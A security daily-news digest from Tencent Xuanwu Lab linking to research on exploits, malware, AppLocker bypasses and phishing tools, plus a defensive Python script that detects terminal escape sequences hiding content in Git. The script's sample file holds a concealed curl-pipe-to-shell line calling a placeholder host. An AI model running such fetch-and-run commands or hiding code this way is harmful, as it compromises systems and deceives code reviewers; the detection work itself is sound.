
Tencent Xuanwu Lab Security Daily News
-
[ Android ] How to debug the HTTP(S) traffic of Android apps with Burp proxy: https://android.jlelse.eu/how-to-debug-http-s-traffic-for-android-apps-with-burp-proxy-73f906821283
-
[ Android ] A tool that generates APK samples exploiting "Janus", the Android APK signature-verification vulnerability disclosed two days ago: https://github.com/odensc/janus
-
[ Crypto ] An introduction to Intel's total memory encryption technologies (TME and MKTME): https://software.intel.com/sites/default/files/managed/a5/16/Multi-Key-Total-Memory-Encryption-Spec.pdf
-
[ Industry News ] Synaptics says the reports of a keylogger in HP laptops are false; the software in question was merely mistaken for a keylogger: https://threatpost.com/synaptics-says-claims-of-a-keylogger-in-hp-laptops-are-false/129175/
-
[ Malware ] Attackers deploy a new ICS attack framework, "TRITON", causing an operational disruption at a critical-infrastructure facility: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html https://www.symantec.com/blogs/threat-intelligence/triton-malware-ics
-
[ MalwareAnalysis ] Trend Micro's analysis of the PRILEX and CUTLET MAKER ATM malware families: http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/
-
[ Popular Software ] A permissions flaw found in Microsoft Azure AD Connect: https://threatpost.com/permissions-flaw-found-azure-ad-connect/129170/
-
[ Popular Software ] Abusing terminal escape sequences to hide content from Git output (a Twistlock Labs experiment): https://www.twistlock.com/2017/12/13/hiding-content-git-escape-sequence-twistlock-labs-experiment/
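The Twistlock Labs item above concerns terminal escape sequences stored inside Git objects (commit messages, file contents) that the terminal interprets when git prints them, so what a reviewer sees on screen can differ from the bytes actually in the repository. The script below is an added example written for this digest, not code from the page or from Twistlock Labs: it finds escape sequences in text, strips them so the raw content is visible, and applies a reject policy of the kind a pre-receive hook could enforce. The sample commit message and file content are constructed here, and example.invalid is a placeholder host.

```python
import re

# Terminal escape sequences to flag: 7-bit CSI (ESC [ ... final byte),
# OSC (ESC ] ... BEL or ESC \), other two-byte ESC sequences, and the
# 8-bit CSI introducer 0x9B. Assumption of this example: anything matching
# these patterns has no business in a commit message or source file.
_ESCAPE_RE = re.compile(
    r"\x1b\[[0-?]*[ -/]*[@-~]"             # CSI: params, intermediates, final byte
    r"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"  # OSC: terminated by BEL or ESC \
    r"|\x1b[@-Z\\-_]"                      # Fe escapes: ESC + one byte in 0x40-0x5F
    r"|\x9b[0-?]*[ -/]*[@-~]"              # 8-bit CSI introducer
)


def find_escape_sequences(text):
    """Return a list of (line_number, column, sequence) for every terminal
    escape sequence found in text. Line numbers are 1-based."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in _ESCAPE_RE.finditer(line):
            findings.append((lineno, match.start(), match.group(0)))
    return findings


def strip_escape_sequences(text):
    """Remove every escape sequence so the reviewer sees the raw content."""
    return _ESCAPE_RE.sub("", text)


def reject_if_hidden(text, label):
    """Policy helper (hypothetical hook logic): returns (ok, report_lines).
    ok is False when any escape sequence is present in text."""
    findings = find_escape_sequences(text)
    if not findings:
        return True, []
    report = ["%s: %d escape sequence(s) found" % (label, len(findings))]
    for lineno, col, seq in findings:
        report.append("  line %d col %d: %r" % (lineno, col, seq))
    return False, report


# Constructed sample commit message: the third line is wrapped in the SGR
# "conceal" attribute (ESC[8m ... ESC[0m), so a terminal that honours it
# renders the text invisibly although the bytes are in the commit object.
SAMPLE_COMMIT_MESSAGE = (
    "Fix typo in README\n"
    "\n"
    "\x1b[8mAlso added deploy hook that calls out to attacker host\x1b[0m\n"
    "Signed-off-by: Example Dev <dev@example.com>\n"
)

# Constructed sample file content with an erase-line sequence (ESC[2K)
# appended to the suspicious line; the raw bytes are intact in the blob.
SAMPLE_FILE_CONTENT = (
    "import os\n"
    "os.system('curl http://example.invalid/x | sh')\x1b[2K\n"
    "print('hello')\n"
)

if __name__ == "__main__":
    for label, text in (("commit message", SAMPLE_COMMIT_MESSAGE),
                        ("file", SAMPLE_FILE_CONTENT)):
        ok, report = reject_if_hidden(text, label)
        print("\n".join(report) if report else "%s: clean" % label)
        if not ok:
            print("raw content after stripping:")
            print(strip_escape_sequences(text))
```

Run the same check over `git cat-file -p` output of commits and over the blobs touched by a push; rejecting on any escape sequence is simpler and safer than trying to decide which ones are harmless.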
-
[ ReverseEngineering ] An introduction to x86_64 reverse engineering: https://leotindall.com/tutorial/an-intro-to-x86_64-reverse-engineering/
-
[ SecurityReport ] Zimperium releases its Q3 2017 Global Threat Report on mobile threats: https://blog.zimperium.com/zimperium-global-threat-report-q3-2017/
-
[ SecurityReport ] 2017 in review through the numbers: the overall statistics from the Kaspersky Security Bulletin 2017: https://securelist.com/ksb-overall-statistics-2017/83453/
-
[ Tools ] A while ago we pushed EFIgy, an open-source tool from Duo Labs that checks whether the EFI firmware version on the current system is the expected one; today the Trail of Bits team released an extension for osquery (the operating-system instrumentation and monitoring framework) that integrates EFIgy's functionality: https://blog.trailofbits.com/2017/12/14/announcing-the-trail-of-bits-osquery-extension-repository/
-
[ Tools ] How to evade antivirus detection with OWASP-ZSC, Part 1: https://www.hackers-arise.com/single-post/2017/05/03/How-to-Evade-AV-with-OWASP-ZSC-Part-1
-
[ Tools ] rr, the record-and-replay debugger (record an execution once, then replay and debug it as many times as needed), has been updated to version 5.1.0: http://robert.ocallahan.org/2017/12/rr-510-released.html http://rr-project.org/
-
[ Tools ] SPF - a social-engineering phishing framework: https://github.com/tatanus/SPF
-
[ Windows ] The Microsoft-signed MavInject32.exe can be used to inject a DLL into an arbitrary process: https://twitter.com/gn3mes1s/status/941315826107510784
-
[ Windows ] 30 ways to bypass AppLocker: https://github.com/api0cradle/UltimateAppLockerByPassList
-
[ Android ] VMP-based app hardening versus third-generation hardening techniques: how strong is the protection in practice?: http://webcache.googleusercontent.com/search?q=cache:KxbcyaSfoRcJ:www.freebuf.com/column/157104.html+&cd=1&hl=zh-CN&ct=clnk&gl=cn
-
[ Industry News ] At 04:43 UTC on December 13, BGPmon observed that the global BGP routing table was redirecting traffic for several major websites to a Russian ISP; the event lasted 6 minutes, and researchers say it may have been a precursor to some kind of attack: https://blog.vectra.ai/blog/bgp-hijackers-this-traffic-is-going-to-russia
-
[ Tools ] How an ELK log-analysis platform can use Sysmon to extend its monitoring coverage and detect real APT34 samples: http://www.ubersec.com/2017/12/14/sysmon-elk-monitoring-integration-and-apt34-tools/
-
[ Tools ] virtual-kubelet - an open-source implementation of the Kubernetes kubelet: https://github.com/virtual-kubelet/virtual-kubelet
-